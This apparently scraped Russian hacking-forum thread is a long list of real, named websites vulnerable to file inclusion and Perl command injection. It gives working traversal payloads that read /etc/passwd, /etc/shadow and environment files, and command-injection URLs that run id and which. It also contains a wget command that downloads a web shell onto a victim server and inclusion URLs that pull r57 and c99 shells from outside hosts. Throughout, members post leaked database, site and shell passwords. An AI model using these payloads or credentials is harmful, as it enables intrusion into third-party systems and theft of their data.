http://www.o3on.com/cgi-bin/use.pl?content=|ls$IFS-lia|
http://www.o3on.com/cgi-bin/use.pl?content=|id|

Я хз че за юзер но wget, curl и прочая дребедень... Там просто их нет. Ошибки при неправильном использовании wget не выдаются. Шелл на перл не залить. Однако файлы читаются отменно

да дело не в том что их нет, они есть, lynx точно, вгета вроде нет
http://www.o3on.com/cgi-bin/use.pl?content=|lynx|
тут дело в том что какая то кривота с командой which, она вообще ничего не находит, даже саму себя =)
http://www.o3on.com/cgi-bin/use.pl?content=|which$IFSwhich|

http://www.o3on.com/cgi-bin/use.pl?content=|which%20which|
вот так работает

http://www.iqauto.com/cgi-bin/hist.pl?cd=|wget%20http://omfg0o.narod.ru/antichat.php%20-O%20/home/iqauto/www//ads/a.php|
шелл найдёте =)

вроде бы локальный инклуд
http://www.mmanews.com/page.php?page=../../../../../../../../../etc/passwd%00

http://svpu-profi.lg.ua/page.php?page=[инклуд]

да дело не в том что их нет, они есть, lynx точно, вгета вроде нет
http://www.o3on.com/cgi-bin/use.pl?content=|lynx|
тут дело в том что какая то кривота с командой which, она вообще ничего не находит, даже саму себя =)
http://www.o3on.com/cgi-bin/use.pl?content=|which$IFSwhich|

_http://www.o3on.com/cgi-bin/use.pl
Шелл. Пароль r57
Ойойёй... бл*ть... юзе.пл переписал... ну и *** с ним...

Ищи проблему в самом шелле
http://www.immovent.ch/index2.php?main=http://forum.antichat.ru/index
Иньекция рабоатет

BanQui
http://www.immovent.ch/index2.php?main=http://www.stroycomplex.by/z.txt?

BanQui
шелл нормальный, это ты криворукий... ;)
+ там safe-mode ON
http://www.immovent.ch/index2.php?main=http://www.stroycomplex.by/r.txt?

http://kastoria.teikoz.gr/pr/html_eng/wrap.php?file=../../../../../../../../../../../etc/passwd
http://www.jcattan.com/dn.php?file=../../../../../../../../../../../etc/passwd
http://webeng.tccg.gov.tw/download.php?file=../../../../../../../../../../../etc/passwd
http://www.ipox.org.tw/download.php?file=../../../../../../../../../../../etc/passwd

http://hendaia.org/?url=../../../../../../../../../../etc/services
http://hendaia.org/?url=../../../../../../../../../../etc/passwd

по теме, антибоян не проверял:
http://cit.cs.dixie.edu/vt/vt4000/notes_from_text.php?filename=../../../../../../../../../../etc/passwd

оффтоп

Чо за бред мля??? Почему я не один файл не могу залить?


во первых ненадо в теме разводить галдеж,а вот вторых:
administrator:ogzsp5I.jyyQs
из конфига сервера..расшифровуй,мб что-то даст.

http://cafix.sourceforge.net/index.php?fichier=../../../../../../../../../etc/passwd

в болталку такие вопросы =\

по теме:
http://www.congress.gov.ph/legis/rules/index.php?rule=
похоже на инклуд, но чтото не получается..может сервачок поближе надо..хз.потрепайте.

http://www.planet-travel.ru/index.php?file=../../../../../../../../../../../etc/passwd

http://wrds.wharton.upenn.edu/cgi-bin/getfile.cgi?dataset=ibes&file=../../../../../../../../../../../../../../../etc/passwd

http://www.syote.net/default_eng.php?file=../../../../../../../../../../../etc/passwd

Сайт института какого то 8)
http://www.redbogota.com/inestudios/descargas/descarga.php?file=../../../../../../../../../../../etc/passwd

http://1shothost.com/kb/index.php?include_file=../../../../../../../../etc/passwd

PR4
http://www.magg.com.tw/isupport/index.php?include_file=../../../../../../../../etc/passwd

http://www.ssga.ru/lidar/index.php?flag=10&file=../../../../../../../../etc/passwd

http://hentan.eu/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.parcheggi.it/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.houseind.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.sacatering.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.biolegend.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.onlineauction.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.mindmovies.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://adamsandler.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://debeddy.net/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://ohioyd.org/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.totalpconline.com/phprocketaddin/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.becrux.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.emsc-csem.org/index.php?page=home&sub=gmap/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.tesis.de/de/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.ejls.eu/download.php?file=../../../../../../../../../../../etc/passwd

http://www.svadba-online.ru/links/?id=../../etc/passwd%00

http://www.svadba-online.ru/links/?id=../../etc/shadow%00

http://www.gjp1.cz/new/index.php?l=12&galeriesw=1&glr=dsdsds
magic_quotes_gpc = On

http://www.netstor.com.tw/dl.php?file=../../../../../../../../../../../etc/passwd
http://www.childrensgarden.ae/lib/download.php?file=../../../../../../../../../../../etc/passwd
http://www.kdsaccessories.com/it/index.php?file=../../../../../../../../../../../etc/passwd
http://www.marine-marketing.gr/newsclip.php?file=../../../../../../../../../../../etc/passwd
http://www.helpterminal.com/index.php?include_file=../../../../../../../../etc/passwd
http://www.movitel.co.cu/descarga.php?file=../../../../../../../../etc/passwd

http://jvdominator.com/helpdesk/index.php?include_file=../../../../../../../../etc/passwd
http://rich.pk/team/index.php?include_file=../../../../../../../../etc/passwd
http://www.pprincipe.cult.cu/cubitas/index.php?pag=../../../../../../../../etc/passwd
http://www.cenda.cult.cu/php/loader.php?page=2&cont=../../../../../../../../etc/passwd
http://www.mmbauche.com/download.php?down=../../../../../../../../etc/passwd
http://www.newagehostingservice.info/iSupport/index.php?include_file=../../../../../../../../etc/passwd
http://www.ccbtools.com/support/index.php?include_file=../../../../../../../../etc/passwd

ph-dep-th.web.cern.ch

http://ph-dep-th.web.cern.ch/ph-dep-th/?site=../../../../../etc/passwd

\

http://christinaaguilera.com/getContent.php?f=../../../../../../../etc/passwd

Это вам не где-нибудь! :)
http://www.jedit.org/index.php?page=/etc/passwd%00

americanairlines упс...
http://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../etc/passwd

Начал изучать пхп иньекты,вот что из этого вышол:
http://www.megaspace.com.br/espaco/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
--------------------------------------
http://www.cesarhoteis.com.br/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
---------------------------------------
http://www.redemultiloja.com.br/publico/php/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
---------------------------------------
http://mundomagico.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
----------------------------------
http://www.cabildoccr.gov.py/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
------------------------------------
http://salveoplanetaterra.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
------------------------------------
http://www.gib-mbh.com/default/index2.php?pagina=../../../../etc/passwd%00
-----------------------------------
http://heshko.com/en/img.php?gal=../../../../../../../../etc/passwd%00
--------------------------------------
http://www.jibberjobber.com/static.php?page=../../../etc/passwd%00
------------------------------------------
http://home.no.net/vikebygd/index.php?vis=../../../../../../../etc/passwd%00
---------------------------------------------
http://www.pontewinery.com/php/index.php5?section=../../../../../../etc/passwd%00
--------------------------------------------
http://www.ays-clan.de/include.php?path=../../../../../../../../etc/passwd%00
-----------------------------------------------
http://www.thehype.de/kambodscha/forum/forum/YaBB.pl?board=../../../../../../../../etc/passwd%00
-------------------------------------------
http://www.eifn.ipacv.ro/index.php?action=../../../../../etc/passwd%00
-----------------------------------------------
http://www.becrux.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00
---------------------------------------
The End!

http://www.wiscnews.com/archives/read.php?info=../../etc/passwd
---------------------------------
http://www.omega.ntnu.no/infosider/omomega.php?vis=../../../../../../etc/passwd%00
-------------------------------
http://www.ies.krakow.pl/konferencje/xxiii/index.php?link=../../../../../etc/passwd
------------------------------
http://forum.autonet.ca/cgi-bin/lookup.pl?user=../../../../../../etc/passwd%00
-------------------------------
http://www.tvmovie.de/dummy.123.0.html?&detail=../../../../../../../../../../../etc/passwd%00
--------------------------------
http://www.teddy.cx/index.php?site_id=../../../../etc/passwd%00
-------------------------------
http://www.thomasgray.org/cgi-bin/display.cgi?text=../../../../../etc/passwd%00
-------------------------------
http://www.yap.org.az/cgi-bin/datacgi/database.cgi?file=../../../../../../../../etc/passwd%00
-------------------------------
http://video.opalenica.com/index.php?sl=../../../../../../../etc/passwd%00
-------------------------------
The End!

Был такой или нет без понятия сори если что.....

http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/passwd%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/hosts%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/ftpusers%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/services%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/group%00

http://www.plaxis.nl/?cat=../../../../../../../../../etc/passwd%00
http://www.tda.as/en/index.php?id=/etc/passwd%00
http://www.bcs.hu/letoltes.php?d_id=../../../../../../etc/passwd
http://forum.anime-club.ro/main.php?m=../../../../../etc/passwd%00
http://www.gkflora.no/index.php?side=/etc/passwd%00
http://www.hermes.bz/autohouse/system/index.cgi?p_act=../../../../../../../../etc/passwd%00

Вот от меня забираем и говорим спасибо =)

http://www.izetit.de/index_projekte.php?page=[INCLUDE] - UNIX
http://www.rockfreak.de/index.php?page=[INCLUDE] - UNIX
http://skc-murman.ru/index.php?page=[INCLUDE]&catid=2 - UNIX, SAFE_MODE

http://singletreffen.de/index.php3?session=&id=../../../etc/passwd%00

www.profucom.com.mx
Profucom de México S.A de C.V. - Tecnología a Tu alcance
http://www.profucom.com.mx/profucom/atencion/help.php?css_path=../../../../../../etc/passwd%00

http://www.rockfreak.de/index.php?page=http://pizdil.freehostia.com/r57shell.txt
http://www.izetit.de/index_projekte.php?page=http://pizdil.freehostia.com/shell - тут загвоска тут подставляет автоматом .htm

У меня вот вопрос! Я нашел норм шелл но когда я какбы вставляю ссылку на него! То вылезает окно как у обычного шелла токо тама он читает, то что находится на моем сайте где он расположен сам!! Пример http://www.grammi.edu.gr/gr/index.php?page=http://pizdil.freehostia.com/gzr.php - тама он показывает то что находитсяя на моем сайте! А не то что находится на сайте www.grammi.edu.gr/ !!! Как это исправить??
www.grammi.edu.gr/gr/index.php?page=about.htm
www.grammi.edu.gr/gr/about.htm
www.grammi.edu.gr/gr/index.php?page=../images/aganargyroi_pic1.jpg

http://www.aquazoo.it/catalog/modules.php?op=modload&name=phpbb2&file=../../../../../../../../etc/passwd
только passwd - permission denied
можно что-нибудь по-вкуснее инклюдить

http://www.volgogradtour.ru/script.php?s=../../../../../../../../../../../../../etc/passwd%00&c=24&m=60
http://sex-flirt.com/index.php3?id=../../../../../../../../../../../../../../../etc/passwd%00
http://singletreffen.de/index.php3?session=&id=../../../../../../../../../../../../../../../../../../../etc/passwd%00

Локальный инклуд

http://drocha.ru/?face=.htaccess


Так же можно смотреть стату сиджа

http://drocha.ru/webmasters.php


Реквизиты для входа:

pornoshkolacom::123
telkiname::121212
sweetyteenru::1234

www.singlespeed.org.uk
http://www.singlespeed.org.uk/article.php?file=../../../../../etc/passwd


www.videnet.gatech.edu
http://www.videnet.gatech.edu/cookbook.en/list_page.php?topic=6&url=../../../../../../etc/passwd&level=1&sequence=1&name=Best+Practices+for+the+Vid

http://firstshot.org/index.php?content_file=../../../../../../etc/passwd

http://www.mrsmalls.com/NewPHP/home.php?section=../../../../../../etc/passwd%00

http://aeroregister.net//home.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.hackshit.com/?page=../../../../../etc/passwd%00

http://www.cs.rmit.edu.au/fedconf/index.html?page=../../../../../../../../../../../../../../../etc/passwd%00 - PHP - include
http://www.cs.rmit.edu.au/fedconf/index.html?page=../../../../../../../../../../../../../../../etc/shadow%00 - узнаем пути
/www/www.cs.rmit.edu.au/special/fedconf/index.html =))
http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd

Давненько активности небыло
http://www.triton.eu/default_en.php?url=../../../../../../../../etc/hosts

http://www.ifu.univ-paris8.fr/HTML/supports_cours/download.php?chemin=../../../../../../../boot.ini
win

$database = "__IFU";
$username = "Site";
$password = "noisy";

Атака по перлам
Бажный perl скрипт на японском ресурсе.
http://tsukuba3.net/cgi-bin/albm.cgi?file=|id|
uid=1170(chicappa.jp-tsukuba3) gid=1000(ChicappaUser) groups=1000(ChicappaUser)
http://tsukuba3.net/cgi-bin/albm.cgi?file=|pwd|
/home/sites/chicappa.jp/users/chicappa.jp-tsukuba3/web/cgi-bin
http://tsukuba3.net/cgi-bin/albm.cgi?file=|which%20lynx|
/usr/bin/lynx
lyns присутствует(wget'a нету). Шелл заливается без проблем. Выкладывать не буду.
Кому надо сам зальет.


ещё нашел.
http://data.ccarnet.org/cgi-bin/respdisp.pl?file=../../../../../../../../../../../etc/passwd

http://www.adm.yrg.kuzbass.net/cgi-adm/lview.pl?file=|id|
uid=80(www) gid=80(www) groups=80(www)
http://www.adm.yrg.kuzbass.net/cgi-adm/lview.pl?file=|pwd|
/var/www/cgi-adm
http://www.adm.yrg.kuzbass.net/cgi-adm/lview.pl?file=|which%20fetch|
/usr/bin/fetch
походу только fetch есть. И через него отлично все заливается. Опять же не буду выкладывать шелл. Кто хочет, без всяких проблем сам зальет

Атака по перлам закончена

http://www.klassika.ru/read.html?proza/../

ыы

http://www.dentalhealth.org.uk/index.php?w=../../../../../../etc/passwd%00

http://cartxpress.info/catalog/filemanager.php?file=../../../../../../../../etc/passwd

http://vitzrotech.com/english/ourproducts/mcb/link.php?file=../../../../../../../../../../etc/passwd

1)
http://www.veryhealthylife.com/page.php?url=../../../../../../../../../../etc/passwd

2)
http://jirisubrt.com/page.php?url=page.php
открываем сами себя и смотрим в сурцах.
<?$file=fopen ($url, "r");
FPassThru ($file);
?>
по сути стандартная читалка
3)
http://www.cpm5000.com/cmnt/download.php?url=../../../../../../../../../etc/passwd&filename=fuck
сохраняем потом открываем и любуемся

http://avatarcollectors.awardspace.com/index.php?id=../../../etc/passwd
вот)

http://www.skiensnett.com/index.php?page=../etc/passwd%00
http://faeetam.com.br/process.php?page=process.php%00&id=28&target=blockRight
http://gtpl-sida.org/index.php?page=formulaire_contact.php%00&idmenu=32&idsmenu=56

мне понравились инклуды) так что проверте и направте меня на правильный путь )
http://alazraq.com/parts/show.php?page=../index.php%00

http://www.dairyriver.com/index.php?page=../../index.php
http://www.solomilan.com/index.php?page=../indexphp%00

http://fleaket.com/index.pl?page=../../../../../../../etc/passwd
читаем passwd

Резуляьтат Смотрим в сурсах

http://www.legalgroup.ru/tmp.php?mf=../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd

www.chcns.us/display.php?folder=enrollment&file=../../../../../../../etc/passwd

случайно нашел, когда ковырял скули)) не крутил - так что грызите =)

Mil.ru
Министерство обороны Российской Федерации
http://www.mil.ru/info/1069/details/index.shtml?id=.%00
тссс))

http://www.jnvu.edu.in/getappointment.php?file='.base64_encode("../index.php")

параметр нужно в base64 перевести...

данные от мускуля

$host = "localhost";
$username ="root";
$databasename ="dtjnvudb";
$password = "DBManager";

http://fleaket.com/index.pl?page=../../../../../../../etc/passwd
читаем passwd

Резуляьтат Смотрим в сурсах

Прошу прощения... Тут можно без проблем все до конца дрвести(до выполнеия кода), уж так решил, посмотреть и довести до ума то, что не довел раньше.
Движлан на перле
читаем index.pl
http://fleaket.com/index.pl?page=index.pl
из содержания можно понять.

Его болезнь
if (open(PAGE, $page))
стоит проверка на наличие файла.
Стандартная связка |id| не прокатит
Там еще есть один момент, но слишком в подробности вдаваться не буду сразу к делу. Эксплуатируется баг следующим образом.
http://fleaket.com/index.pl?page=/|id|]
просто получаем выполнение кода.
uid=48(apache) gid=48(apache) groups=48(apache)

http://fleaket.com/index.pl?page=/|which%20wget|
/usr/bin/wget

Вроди как робит вгет, кому надо забирайте.

Еще из исходника понял, что продукт называется
PhoneBox

уязвимость OsCommerce/вывод файлов.
вот конфиг с паролями отмайскула. кому надо, юзайте )
http://bergfolk.de/buy/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
таким образом можно и почитать /etc/passwd, но это уже думайте сами )

___
Спс скажи ++!

Хотя ладно, пользуйтесь на здоровье:
http://bergfolk.de/buy/extras/update.php?read_me=0&readme_file=../../../../../../etc/passwd

Десяток. PR разношерстный.
http://protan.ru/page3.php?open=../../../../../etc/passwd
http://www.deweydoes.org/index.php?page=../../../../../../../etc/passwd
http://www.ulpan.net/index.php?menu=start&page=../../../../etc/passwd
http://www.scheduledairlinefailure.co.uk/index.php?page=../../../../etc/passwd
http://deserteuropean.com/content.html?page=../../../../../../etc/passwd
http://www.dumamanzi.co.za/index.php?page=../../../../etc/passwd OR etc/shadow(черный текст на черном фоне)
http://www.kerryjohnson.com/index12.php?page=../../../etc/passwd
https://www.asmic.co.jp/asmic.php?page=../../../../etc/passwd
http://amhet.com/?page=../../../../../../etc/passwd
http://www.ansicom.net/main.php?page=../images/pic1.jpg

Edu
http://disability.ucdavis.edu/news_retrieve.php?Article=../../../boot.ini
windows

http://www.turnir.ro/?locatie=/../../../../../../../../../../../../../../../../../etc/passwd

edu
есть пхпмайадмин))
http://duck.creighton.edu/index.php?target=../../../../../etc/passwd

http://elab.njit.edu/seio/index.php?page_link=../../../../../../../../etc/passwd&menu=6&page_name=Section+des+membres

http://altronix.securesites.net/index.php?pid=2&page_link=../../../../etc/passwd

http://editiere.de/demo/edit/filemanager.php?cdir=../../../www.editiere.de/
А вот это вообще веселье, вижу такое впервые, компания предоставляет хостинг и вот такое есть на сайте =) натолкнулся вообще случайно... =) В нем можно так же загружать файлы=)

GAV-GAV =)
http://partcfitpvt.vermont.gov/parental_rights.php?show=../../../../../../../../../etc/passwd

gpec.ubc.ca PR5
http://www.gpec.ubc.ca/index.php?content=../../../etc/passwd
Админка:
http://www.gpec.ubc.ca/admin/
C basic авторизацией =)
Ну админка лысая =) ее можно посмотреть вот так:
http://www.gpec.ubc.ca/index.php?content=admin/index.php

http://www.mirandasalon.kiev.ua/index.php?menu_lang=0&page=../../../../../../../etc/passwd&dop_menu=visible&menu_poz=1&tk=0&n_img=1

http://www.pdn.dkp.go.id/index.php?mod=../../../../../../../../../../../../etc/passwd

http://www.dosuga.net/?type=anek&seq=doc&mk=on&num=
http://www.dosuga.net/anek/doc/titul.txt
http://www.dosuga.net/?type=anek&seq=xaker&mk=on&num=
http://www.dosuga.net/anek/xaker/titul.txt

http://www.dosuga.net/?type=../&seq=../%3C!--/*


P.S
sorry if something is wrong

PR7
http://www.phedigital.com/portal/es/load.php?file=some_file
Какой то суровый инсклуд =\ самого себя можно заинсклудить, /etc/passwd не хочет, сессии просто выдаются на экран, а не инсклудятся ..

удаленный инклуд :)

http://www.rocklandkaratedo.com/index.php?id=[url]

http://www.zorgbelang-flevoland.nl/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
----------------------------------------------------------
http://psico.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
------------------------------------------------------------
http://paulozambroza.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
----------------------------------------------------------------
http://www.domplan.pl/index.php?sl=../../../../../../../etc/passwd%00
----------------------------------------------------------
The End!

:)

http://www.guidoforster.ch/index.php?id=../../../../../../../../../../../../../../../etc/passwd%00

mutazu.com
http://www.mutazu.com/products.php?cat_id=7&product_id=101&s=../../../../../../../../etc/passwd

http://www.anastacionoticias.com.br/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
----------------------------------------------------------------
http://psico.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
----------------------------------------------------------------
The End!

38 штучек, PR разный, от 0 до 5-ти...

[PR 5] http://www.americanprimrosesociety.org/index.php?content=../../../../../etc/passwd&menu=societymenu.php
[PR 5] http://www.asianreviewofbooks.com/arb/textout.php3?filename=../../../../../../etc/passwd%00
[PR 5] http://www.avatiach.com/index.jsp?WORKING_CLASS=avatiach.ShowHtml&fileName=../../../../etc/passwd
[PR 4] http://gpu4vision.icg.tugraz.at/index.php?content=../../../../../etc/passwd
[PR 1] http://www.saamoa.ch/theartofbob/index.php?lang=en&content_main=../../../../etc/passwd
[PR 0] http://www.lilheartsandhands.com/index.php?contentm=../../../../etc/passwd
[PR 4, PR домена - 8] http://web.auth.gr/dent/web/el/depts/index.php?lab=endo&content=../../../../../etc/passwd
[PR 3] http://www.tvdn.eu/index.php?content=../../../../../../../etc/passwd
[PR 2] http://www.go4it-stafette.ch/index.php?content=http://www.evilc0der.com/c99.txt
[PR 0] http://www.indefinitez.com/index.php?page=../../../../etc/passwd
[PR 1] http://www.deganferah.ch/index.php?content=../../../etc/passwd
[PR 0] http://www.spksteuer.de/index.php?open=42&content=../../../../etc/passwd
[PR 4] http://www.curriculumrenewal.com/index.php?content=http://www.evilc0der.com/c99.txt
[PR 4] http://www.seawhale.com.tw/en/index.php?content=../../../../../etc/passwd
[PR 1] http://www.tip-automobile.ch/index.php?content=../../../etc/passwd
[PR 1] http://www.physio-jungeundrudolph.de/index.php?content=../../../../../../etc/passwd
[PR 0] http://www.ebfs.eu/de/?directory=News&page=../../../../../etc/passwd
[PR 4] http://www.paloaltophoto.com/auto_page.php?page=../../../../../etc/passwd (зрите в сорцы страницы)
[PR 3] http://www.hrchiro.com/index.cfm?page=../../../../../etc/shadow
[PR 0] http://www.dreamnet-comm.com/index.php?body=../../../etc/passwd
[PR 3] http://www.jakuzisattempt.com/read.php?filename=../../../etc/passwd
[PR 1] http://www.learn2spin.co.uk/admin/coastadmin.php?filename=../../../../../etc/passwd
[PR NA] http://www.smok-krakow.ovh.org/index.php?page=article.php&filename=../../../../../../etc/passwd
[PR 0] http://www.detaling.ru/page.php?filename=../../../../../../etc/passwd
[PR 0] http://www.rubinpartners.com.au/?page=../../../../../etc/passwd
[PR 1] http://www.gamillahphotography.com/index.php?page=../../../../etc/passwd
[PR 3] http://www.sebmedia.com/index.php?page=../../../../../etc/passwd
[PR 1] http://www.midirectory.com/cgi-bin/Dispatcher.php?ACTION=StaticPage.php&PAGE=../../../etc/passwd
[PR 1] http://www.indydesserts.com/?page=../../../../../../../../etc/passwd
[PR 3] https://www.talentxpress.com/html.php?page=../../../../etc/passwd
[PR 0] http://goalandsales.com/index.php?page=../../../../../etc/passwd
[PR 0] http://www.alohamortgage.com/?page=../../../etc/passwd
[PR 0] https://www.talentflare.com/html.php?page=../../../../etc/passwd
[PR 3] http://www.labortemps.com/pages/labor-temp.php?page=../../../../../../../../../etc/passwd
[PR 0] http://www.mercurimport.com/index.php?Page=../../../etc/passwd
[PR 0] http://www.agpe.com.au/index.php?page=../../../../etc/passwd
[PR 0] http://www.thebandicoots.com/index.php?page=../../../etc/passwd
[PR 1] http://www.puebloway.org/index.cfm?page=../../../../boot.ini (Win)

jokester, не ругайся, насяльника, на баяны пробил вроде! =)

Мой первый ПХП-инжекшн:
http://rfid-labs.dk/index.php?SubMenu=menu/submenu4.php&HeaderTextCode=4&ContentFile=/etc/passwd

Мой первый удаленный ПХП-инжекшн:
http://thetalentmentors.com/print.php?contentFile=RFI.

bagfix.com - PR1 =\
http://www.bagfix.com/index.php?fid=../../../../../../../../../etc/passwd

вопрос про тему
а почему собственно в данную тему выкладывают только PHP-инклюдинг, когда тема называется PHP-инъекции?

Вообще-то PHP-инъекция это - выполнение постороннего PHP кода на серверной стороне:
http://www.ishmaelkhaldi.com/documents/blog.php?asd=blog.php&category_id=<?phpinfo()?>

http://www.hitronetic.com/nouveausite/index1.php?langue=en&filemenu=menu.php?filecontent=../../../../etc/passwd

thehilltimes.ca
http://www.thehilltimes.ca/members/login.php?fail=2&destination=/html/index.php?display=story&full_path=../../../../../../../../etc/passwd

joomler для вопросов есть отделная ветка =) а так это инклуд файлов и именно с этим ты ничего не сделаешь, как вариант ищи конфиги и так далее, где можно выудить пароли или еще что

http://www.metro.ro/index.php?screen=SiteServicesQuality/content&page=../../../../../etc/passwd%00

http://www.msu.ac.zw/info/news/m2006.showlist.php?file=../../../../../../../../../../../../etc/passwd

nexx.ca
http://www.nexx.ca/customer-care-faq.php?id=../../../../../etc/passwd

RFI ХАЧУ ПЛЮСЕГ! =)

http://www.birminghamsciencecity.com/about/people/working.php?incFile=RFI?
http://www.cahi.co.za/index.php?page=RFI
http://www.statuscapital.co.za/index.php?page=RFI?
http://tioline.ru/index.php?page=RFI?
http://www.eloduna.hu/index.php?page=RFI

http://www.utexas.edu/research/features/story.php?item=../../includes/config.php
Safe-mode


"SOAP_login" and "SOAP_pass" are the login credentials for the UT news Wordpress database */
$conf['SOAP_login'] = 'SOAPclient_research';
$conf['SOAP_pass'] = 'aw3edc';

Greetz again here a little site in Netherlands

www.catchlight.nl/index.php?pagina=../../../../../../../../../../etc/passwd%00

http://www.atlllc.com/atlantis.php?page=/etc/passwd%00

http://www.naturesgoodness.com.au/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html

http://www.outlets.ca/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

http://anapacenter.info/index.pl?id=../../../../../../../../../../etc/passwd%00

http://www.zambezigroceries.com/index.php?page=../../../../../../../../../proc/self/environ

www.dnocs.gov.br/php/util/downloads_file.php?&dir=&file=/etc/passwd

http://www.durangotelegraph.com/index.php?inc=/../../../../../../../../../../../../../../etc/passwd
http://www.ege.fcen.uba.ar/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.freulerchilbi.ch/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.mombergstube.de/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.q3s.de/portfolio/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.helpwithmath.com/index.php?include=../../../../../../../../../../../../../../etc/passwd

http://www.biodieselcambodia.com/index.php?inc=../../../../../../../../../../../../../../proc/self/environ
http://www.christianalbrecht.de/au/index.php?inc=../../../../../../../../../../../../../../proc/self/environ
http://www.dogwalker.com.br/blog/index.php?inc=../../../../../../../../../../../../../../proc/self/environ

Мешает open_basedir
http://pdcon.cz/elearning/obcan/index.php?inc=open_basedir
http://www.zeegersloot.nl/index.php?inc=open_basedir
http://www.mediahostnet.com/v2/index.php?inc=manual&p=open_basedir
http://www.outtatime.com.au/index.php?inc=open_basedir
http://stramberk.ecn.cz/index.php?inc=open_basedir
http://www.dieschwarzataler.at/album/index.php?inc=open_basedir
http://www.zonabern.ch/index.php?inc=open_basedir
http://www.stufenlos.ch/index.php?inc=open_basedir
http://kompaktservice.com/index.php?include=open_basedir

Read File | windows
http://classicandbasic.sytes.net/classic/index.php?inc=windows_inc
http://www.kyoto-eiyoiryo.ac.jp/kisotsu/index.php?inc=windows_inc
http://www.doh.gov.za/hmtp/index.php?include=windows_inc
http://www.cafda.org.za/index.php?include=windows_inc
http://www.fes.org.za/index.php?include=windows_inc
http://www.fawu.org.za/index.php?include=windows_inc
http://www.lionfunds.co.za/index.php?include=windows_inc

Чёрным по черному
http://www.venturesnowboards.com/index_07.php?inc=../../../../../../../../../../../../../etc/passwd

http://www.artdesigner.ru/?f=web&p=Локальный инклюд (Стоят Chmod'ы :( )
http://www.artoi.ru/index.php?p=х.з. вроде инклюд

http://sportskenovosti.hr/index.php?cmd=../../../../etc/passwd%00
http://support.novusnow.ca/internet/index.php?cmd=../../../etc/passwd%00
http://www.rv-nrw.de/page.php?include=../../../../../../etc/passwd

sql injection+php include - т.к. вывода нету то можно узать как php include.

http://www.swsys.ru/index.php?page=53+union+select+1,2,3,4,0x2e2e2f2e2 e2f2e2e2f2e2e2f626f6f742e696e69,6,7,8--+

http://www.peek.org/bryan/game/dnd.php?p=../../../../../../../../etc/passwd%00

http://www.amacanada.org/template.php?fileName=../../../../../../../../../../../../../../../../../etc/passwd
http://www.syntasoft.com/template.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
http://www.supreme-commander.ru/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd
http://4ertim.com/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd
http://prospectinfo.ru/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

http://www.nccs.biz/lebanonballetschool/display.php?page=display.php

тама редирект так чо открывать каким нить AccessDiver!
100 пост )))

http://www.autobahn24.net/autohtml.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
http://www.liga24.org/autohtml.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
http://www.rechtsberater-cccr.de/autohtml.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
и немного клубнички:
http://www.wildhookups.com/hosted/index.php?wm_login=hornyguys&cf=&geo=&app=&sub=&site=man_hook_ups1&page=../../../../../../../../../../../../../../../../../etc/passwd

http://www.broughton.nsw.edu.au/casc/template.php?include=../../../../../../../../../../../../../../etc/passwd&heading=Links

http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=../../../../../../../../../../../../etc/passwd

а тут phpinfo() : http://www.saminfo.ru/~dmitrypg/x/info.php

возможно просматривать директории т.к. используется fopen + потому что ось FreeBSD (Морок)

Как пример http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=../../../../../../../../../../../../etc/

если кто сможет найти пароли от фтп киньте плиз в личку оч прошу)))

PHPlist Bug

Post Command:

_SERVER[ConfigFile]=../../../../../../../../../../../etc/passwd

http://www.scythe-eu.com/newsletter/lists//admin/index.php
http://newsletter.mdg-unternehmensberatung.de/newsletter/lists//admin/index.php
http://www.rmaxinternational.com/newsletter/lists//admin/index.php
http://www.kulinaria-mehr.de/newsletter/lists//admin/index.php
http://www.oil-price.net:8000/newsletter/lists//admin/index.php
